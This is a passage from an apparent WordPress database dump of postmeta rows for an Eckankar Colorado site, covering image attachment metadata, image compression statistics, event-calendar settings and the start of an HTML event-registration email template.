idth\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117046;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35787;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88954;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58546;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40147;}s:8:\"tileview\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45350;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:37:\"fall-bridge-over-water-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:374394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183627,268520,'original-file','2022/03/mountain-stream-5op-updraft-pre-smush-original.jpg'),(183628,268520,'smush-complete','1'),(183629,268520,'smush-info','The file was compressed from 870.91 KB to 803.79 KB saving 7.71 percent using WP-Optimize'),(183630,268520,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:891812;s:12:\"smushed-size\";i:823085;s:15:\"savings-percent\";d:7.70999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:891812;s:10:\"compressed\";i:823085;}s:6:\"medium\";a:2:{s:8:\"original\";i:20124;s:10:\"compressed\";i:19479;}s:5:\"large\";a:2:{s:8:\"original\";i:208144;s:10:\"compressed\";i:199927;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8655;s:10:\"compressed\";i:8655;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:119690;s:10:\"compressed\";i:114798;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:31739;s:10:\"compressed\";i:30853;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:57647;s:10:\"compressed\";i:55468;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:38883;s:10:\"compressed\";i:37410;}s:8:\"tileview\";a:2:{s:8:\"original\";i:38791;s:10:\"compressed\";i:37809;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:444881;s:10:\"compressed\";i:428314;}}}'),(188182,268837,'mec_additional_location_ids','a:0:{}'),(188183,268837,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-16\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-16\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(185913,268691,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1061;s:6:\"height\";i:92;s:4:\"file\";s:27:\"2023/06/sa-events-img-2.jpg\";s:8:\"filesize\";i:6992;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-350x30.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1390;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"sa-events-img-2-1024x89.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5074;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-150x92.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:838;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-768x67.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3425;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-300x92.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1344;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-500x92.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2162;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-474x92.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2020;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-391x92.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1693;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"sa-events-img-2-300x92.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1344;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(185912,268691,'_wp_attached_file','2023/06/sa-events-img-2.jpg'),(186206,268726,'mec_hide_end_time','0'),(183619,268518,'_wp_attached_file','2022/03/mountain-stream-4op.jpg'),(183620,268518,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1645;s:6:\"height\";i:903;s:4:\"file\";s:31:\"2022/03/mountain-stream-4op.jpg\";s:8:\"filesize\";i:898254;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20395;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"mountain-stream-4op-1024x562.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:562;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8805;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-768x422.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121710;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32538;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58767;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39636;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"mountain-stream-4op-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40064;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:32:\"mountain-stream-4op-1536x843.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:843;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:451420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188179,268837,'mec_cost',''),(188180,268837,'mec_currency','a:0:{}'),(188181,268837,'mec_additional_organizer_ids','a:0:{}'),(188178,268837,'mec_more_info_target','_self'),(185911,268687,'_seq_num','137'),(185910,268687,'_form_id','13'),(183615,268516,'original-file','2022/03/mountain-stream-3-updraft-pre-smush-original.jpg'),(183616,268516,'smush-complete','1'),(183617,268516,'smush-info','The file was compressed from 935.43 KB to 857.60 KB saving 8.32 percent using WP-Optimize'),(183618,268516,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:957882;s:12:\"smushed-size\";i:878183;s:15:\"savings-percent\";d:8.32000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:957882;s:10:\"compressed\";i:878183;}s:6:\"medium\";a:2:{s:8:\"original\";i:21891;s:10:\"compressed\";i:21007;}s:5:\"large\";a:2:{s:8:\"original\";i:225692;s:10:\"compressed\";i:215806;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9453;s:10:\"compressed\";i:9387;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:130268;s:10:\"compressed\";i:124469;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:34897;s:10:\"compressed\";i:33589;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:62974;s:10:\"compressed\";i:60239;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:42434;s:10:\"compressed\";i:40587;}s:8:\"tileview\";a:2:{s:8:\"original\";i:42985;s:10:\"compressed\";i:41486;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:482504;s:10:\"compressed\";i:462168;}}}'),(188175,268837,'mec_read_more',''),(188176,268837,'mec_more_info',''),(188177,268837,'mec_more_info_title',''),(188174,268837,'mec_organizer_id','1'),(183611,268516,'_wp_attached_file','2022/03/mountain-stream-3.jpg'),(183612,268516,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1645;s:6:\"height\";i:903;s:4:\"file\";s:29:\"2022/03/mountain-stream-3.jpg\";s:8:\"filesize\";i:957882;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21891;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"mountain-stream-3-1024x562.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:562;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:225692;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9453;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-768x422.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130268;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34897;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62974;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42434;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"mountain-stream-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42985;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:30:\"mountain-stream-3-1536x843.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:843;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:482504;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183623,268520,'_wp_attached_file','2022/03/mountain-stream-5op.jpg'),(183624,268520,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1645;s:6:\"height\";i:906;s:4:\"file\";s:31:\"2022/03/mountain-stream-5op.jpg\";s:8:\"filesize\";i:891812;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20124;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"mountain-stream-5op-1024x564.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:208144;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8655;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-768x423.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:423;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119690;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31739;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57647;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38883;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"mountain-stream-5op-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38791;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:32:\"mountain-stream-5op-1536x846.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:846;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:444881;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193679,269202,'_field_652','Bell'),(193678,269202,'_field_654','Nancy '),(191687,269043,'original-file','2023/09/fall-bridge-over-water-1-updraft-pre-smush-original.jpg'),(191688,269043,'smush-complete','1'),(191689,269043,'smush-info','The file was compressed from 601.30 KB to 573.94 KB, saving 4.55 percent, using WP-Optimize'),(188173,268837,'mec_dont_show_map','0'),(181614,268415,'_wp_attached_file','2023/04/setting-sun-river-3.jpg'),(181615,268415,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:721;s:6:\"height\";i:420;s:4:\"file\";s:31:\"2023/04/setting-sun-river-3.jpg\";s:8:\"filesize\";i:78509;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"setting-sun-river-3-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14489;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"setting-sun-river-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6013;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"setting-sun-river-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18234;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"setting-sun-river-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33252;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"setting-sun-river-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23815;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"setting-sun-river-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20668;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(181616,268410,'_thumbnail_id','266874'),(185335,268265,'mec_cost_auto_calculate','0'),(181619,268415,'original-file','2023/04/setting-sun-river-3-updraft-pre-smush-original.jpg'),(181620,268415,'smush-complete','1'),(181621,268415,'smush-info','The file was compressed from 76.67 KB to 73.90 KB saving 3.61 percent using WP-Optimize'),(181622,268415,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:78509;s:12:\"smushed-size\";i:75675;s:15:\"savings-percent\";d:3.609999999999999875655021241982467472553253173828125;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:78509;s:10:\"compressed\";i:75675;}s:6:\"medium\";a:2:{s:8:\"original\";i:14489;s:10:\"compressed\";i:14357;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6013;s:10:\"compressed\";i:5947;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18234;s:10:\"compressed\";i:18234;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:33252;s:10:\"compressed\";i:33102;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:23815;s:10:\"compressed\";i:23674;}s:8:\"tileview\";a:2:{s:8:\"original\";i:20668;s:10:\"compressed\";i:20668;}}}'),(181623,268416,'_wp_attached_file','2023/04/GoldenStar.webp'),(181624,268416,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:23:\"2023/04/GoldenStar.webp\";s:8:\"filesize\";i:23150;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"GoldenStar-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8202;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"GoldenStar-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4196;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"GoldenStar-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11736;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"GoldenStar-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18046;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"GoldenStar-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13414;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"GoldenStar-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14826;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192727,269144,'one_occurrence','0'),(192726,269144,'mec_allday','0'),(192724,269144,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192725,269144,'mec_certain_weekdays','a:0:{}'),(192723,269144,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-15\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-15\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192722,269144,'mec_additional_location_ids','a:0:{}'),(192721,269144,'mec_additional_organizer_ids','a:0:{}'),(192720,269144,'mec_currency','a:0:{}'),(192719,269144,'mec_cost_auto_calculate','0'),(192718,269144,'mec_cost',''),(192717,269144,'mec_more_info_target','_self'),(192716,269144,'mec_more_info_title',''),(192715,269144,'mec_more_info',''),(192714,269144,'mec_read_more',''),(192713,269144,'mec_organizer_id','1'),(192712,269144,'mec_dont_show_map','0'),(192711,269144,'mec_location_id','185'),(192710,269144,'mec_color',''),(192709,269143,'_edit_last','2'),(192708,269143,'_edit_lock','1696276427:2'),(192707,269143,'_dp_original','268843'),(192705,269143,'mec_banner','a:0:{}'),(192704,269143,'mec_related_events','a:0:{}'),(192703,269143,'mec_event_gallery','a:0:{}'),(192702,269143,'mec_sequence','17'),(192689,269143,'passster_protection_type','password'),(192690,269143,'boldgrid_hide_page_title','0'),(192691,269143,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(192692,269143,'boldgrid_in_page_containers','1'),(192693,269143,'_thumbnail_id','266063'),(192694,269143,'_wp_old_date','2022-04-30'),(192695,269143,'passster_area_shortcode',''),(192696,269143,'mec_cost_auto_calculate','0'),(192697,269143,'mec_style_per_event','global'),(192698,269143,'mec_trailer_url',''),(192699,269143,'mec_trailer_title',''),(192700,269143,'mec_start_datetime','2023-10-08 10:30 AM'),(192701,269143,'mec_end_datetime','2023-10-08 11:30 AM'),(192682,269143,'mec_event_status','EventScheduled'),(192683,269143,'mec_moved_online_link',''),(192684,269143,'mec_cancelled_reason',''),(192685,269143,'mec_display_cancellation_reason_in_single_page',''),(192686,269143,'protect_children',''),(192687,269143,'passster_activate_global_protection',NULL),(192688,269143,'passster_activate_protection',NULL),(192673,269143,'mec_fees','a:0:{}'),(192674,269143,'mec_ticket_variations_global_inheritance','1'),(192675,269143,'mec_ticket_variations','a:0:{}'),(192676,269143,'mec_reg_fields_global_inheritance','1'),(192677,269143,'mec_reg_fields','a:0:{}'),(192678,269143,'mec_bfixed_fields','a:0:{}'),(192679,269143,'mec_op','a:0:{}'),(192680,269143,'mec_fields','a:0:{}'),(192681,269143,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration 